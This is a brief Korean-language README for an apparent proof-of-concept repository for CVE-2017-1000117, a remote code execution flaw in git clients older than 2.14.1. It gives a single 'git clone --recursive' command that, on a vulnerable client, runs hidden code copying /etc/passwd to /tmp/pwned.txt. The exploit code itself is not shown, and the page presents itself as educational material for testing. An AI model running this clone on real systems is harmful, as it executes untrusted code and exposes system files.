
CVE-2017-1000117에 대한 개념 증명 익스플로잇으로, v2.14.1 이전의 git 클라이언트에서 발생하는 원격 코드 실행 취약점이며, 교육 목적으로 재귀적 클론 악용을 시연합니다.
git-client-rce PoC(CVE-2017-1000117) 테스트용 GIT 저장소
https://marc.info/?l=git&m=150238802328673&w=2
이 CVE는 v2.14.1 미만의 모든 git 클라이언트에 영향을 미칩니다.
테스트 시스템에서 다음을 실행하여 PoC를 확인하십시오:
$git clone --recursive https://github.com/thelastbyte/CVE-2017-1000117.git
실행에 성공하면 /etc/passwd의 내용이 /tmp/pwned.txt에 복사됩니다.